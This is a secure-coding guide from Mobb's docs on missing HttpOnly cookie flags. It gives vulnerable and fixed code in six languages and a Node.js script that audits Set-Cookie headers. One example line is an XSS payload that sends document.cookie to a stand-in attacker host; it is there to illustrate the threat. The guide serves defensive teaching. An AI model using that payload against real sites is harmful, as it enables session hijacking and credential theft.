Mobb User Docs
HttpOnly Cookie Vulnerabilities

Learn how to prevent HttpOnly cookie vulnerabilities with real code examples and best practices. Protect your web applications from session hijacking and XSS attacks.

Tools recognizing this:

Opengrep Fortify Checkmarx SonarQube Snyk Semgrep CodeQL

What is HttpOnly Cookie and Why is it Important?

The HttpOnly flag is a security feature that helps prevent client-side access to cookie data through JavaScript. When a cookie is set with the HttpOnly flag, it becomes inaccessible to client-side scripting languages like JavaScript, helping protect against Cross-Site Scripting (XSS) attacks.

Without the HttpOnly flag, cookies are vulnerable to:

  • Theft through XSS attacks

  • Session hijacking

  • Unauthorized access to sensitive cookie data

  • Client-side manipulation of cookie values

This guide covers HttpOnly cookie vulnerabilities, examples, prevention methods, and how to properly secure cookies in your applications.

One Simple HttpOnly Cookie Vulnerability Example

Consider this basic example of setting a cookie:

Cookie cookie = new Cookie("sessionId", sessionValue);
response.addCookie(cookie);

An attacker exploiting an XSS vulnerability could steal this cookie using JavaScript:

<script>fetch('https://attacker.com?cookie='+document.cookie)</script>

The cookie data would be accessible because the HttpOnly flag is not set, allowing the attacker to hijack the user's session.

HttpOnly Cookie Prevention Methods: How to Fix Your Code

The most effective way to fix HttpOnly cookie vulnerabilities is to explicitly set the HttpOnly flag when creating cookies. This ensures that the cookie cannot be accessed through client-side scripts, providing an additional layer of security against XSS attacks.
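To confirm that a fix of this kind actually reached the browser, the check below parses the Set-Cookie headers a response emits and reports cookies that lack HttpOnly (and, as a secondary finding, Secure). It is an added example, not Mobb's code; the sample headers are constructed to mirror the vulnerable and fixed cookies in this guide, and the session-name pattern used to rank severity is a hypothetical heuristic.

```javascript
// Added example (not Mobb's code): audit Set-Cookie headers for the HttpOnly flag.
// Run with: node httponly_audit.js

// Parse one Set-Cookie header value into its cookie name and attribute map.
// Attribute names are case-insensitive (RFC 6265), so keys are lower-cased.
function parseSetCookie(headerValue) {
  const parts = headerValue.split(";").map((p) => p.trim()).filter(Boolean);
  const [pair, ...attrs] = parts;
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq).trim();
  const attributes = {};
  for (const attr of attrs) {
    const i = attr.indexOf("=");
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    attributes[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return { name, attributes };
}

// Hypothetical heuristic: names that usually carry authentication state.
const SESSION_NAME_PATTERN = /sess|auth|token|jwt/i;

// Return one finding per missing flag for every Set-Cookie header in a response.
function auditSetCookies(setCookieHeaders) {
  const findings = [];
  for (const header of setCookieHeaders) {
    const { name, attributes } = parseSetCookie(header);
    const sessionLike = SESSION_NAME_PATTERN.test(name);
    if (!("httponly" in attributes)) {
      // A session cookie readable by document.cookie is the case this guide describes.
      findings.push({ cookie: name, issue: "missing HttpOnly", severity: sessionLike ? "high" : "medium" });
    }
    if (!("secure" in attributes)) {
      findings.push({ cookie: name, issue: "missing Secure", severity: sessionLike ? "high" : "low" });
    }
  }
  return findings;
}

// Constructed sample headers: the guide's vulnerable and fixed session cookie as the
// browser would receive them, plus a preference cookie that holds no auth state.
const SAMPLE_HEADERS = [
  "sessionId=abc123; Max-Age=3600; Path=/; Secure",           // vulnerable
  "sessionId=abc123; Max-Age=3600; Path=/; HttpOnly; Secure", // fixed
  "theme=dark; Path=/",                                       // low risk
];

console.log(auditSetCookies(SAMPLE_HEADERS));
```

The same function can be pointed at captured response headers from a proxy or an integration test, which catches frameworks or middleware that silently drop the flag.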

Code Samples

Vulnerable Code (Java)

Cookie cookie = new Cookie("sessionId", sessionValue);

Fixed Code (Java)

Cookie cookie = new Cookie("sessionId", sessionValue);
cookie.setHttpOnly(true);
response.addCookie(cookie);

Fix Explanation

The vulnerable code creates a cookie without the HttpOnly flag. The fix explicitly sets the HttpOnly flag using setHttpOnly(true). This prevents JavaScript access to the cookie. The cookie becomes more resistant to XSS attacks.

Vulnerable Code (Node.js / Express)

res.cookie('sessionId', sessionValue, {
    secure: true,
    maxAge: 3600000
});

Fixed Code (Node.js / Express)

res.cookie('sessionId', sessionValue, {
    secure: true,
    httpOnly: true,
    maxAge: 3600000
});

Fix Explanation

The vulnerable code sets a cookie without the HttpOnly flag. The fix adds the httpOnly option to the cookie configuration. This prevents client-side JavaScript from accessing the cookie. The cookie becomes more secure against XSS attacks.

Vulnerable Code (Python)

response.set_cookie('sessionId', session_value,
    secure=True,
    max_age=3600
)

Fixed Code (Python)

response.set_cookie('sessionId', session_value,
    secure=True,
    httponly=True,
    max_age=3600
)

Fix Explanation

The vulnerable code creates a cookie without the HttpOnly flag. The fix adds the httponly parameter set to True. This prevents JavaScript from accessing the cookie. The cookie becomes protected against client-side script access.

Vulnerable Code (C# / ASP.NET)

HttpCookie cookie = new HttpCookie("sessionId", sessionValue);
Response.Cookies.Add(cookie);

Fixed Code (C# / ASP.NET)

HttpCookie cookie = new HttpCookie("sessionId", sessionValue);
cookie.HttpOnly = true;
Response.Cookies.Add(cookie);

Fix Explanation

The vulnerable code creates a cookie without the HttpOnly property. The fix sets the HttpOnly property to true. This prevents client-side access to the cookie. The cookie becomes more secure against XSS attacks.

Vulnerable Code (PHP)

setcookie("sessionId", $sessionValue,
    time() + 3600,
    "/",
    "example.com",
    true
);

Fixed Code (PHP)

setcookie("sessionId", $sessionValue,
    time() + 3600,
    "/",
    "example.com",
    true,
    true
);

Fix Explanation

The vulnerable code sets a cookie without the HttpOnly flag. The fix adds true as the last (httponly) parameter to enable HttpOnly. This prevents JavaScript access to the cookie. The cookie becomes protected against client-side access.

Vulnerable Code (Ruby on Rails)

cookies[:session_id] = {
  value: session_value,
  expires: 1.hour.from_now,
  secure: true
}

Fixed Code (Ruby on Rails)

cookies[:session_id] = {
  value: session_value,
  expires: 1.hour.from_now,
  secure: true,
  httponly: true
}

Fix Explanation

The vulnerable code creates a cookie without the HttpOnly flag. The fix adds the httponly: true option to the cookie. This prevents JavaScript from accessing the cookie. The cookie becomes more secure against XSS attacks.

Need more help in preventing HttpOnly Cookie vulnerabilities?

Mobb supports fixing many forms of HttpOnly Cookie vulnerabilities, and can mitigate your issues in batch. Start now for free at https://app.mobb.ai

We'd love your feedback!

We're excited to hear your thoughts and ideas about fixing vulnerabilities. Reach out if you have any corrections, questions or suggestions.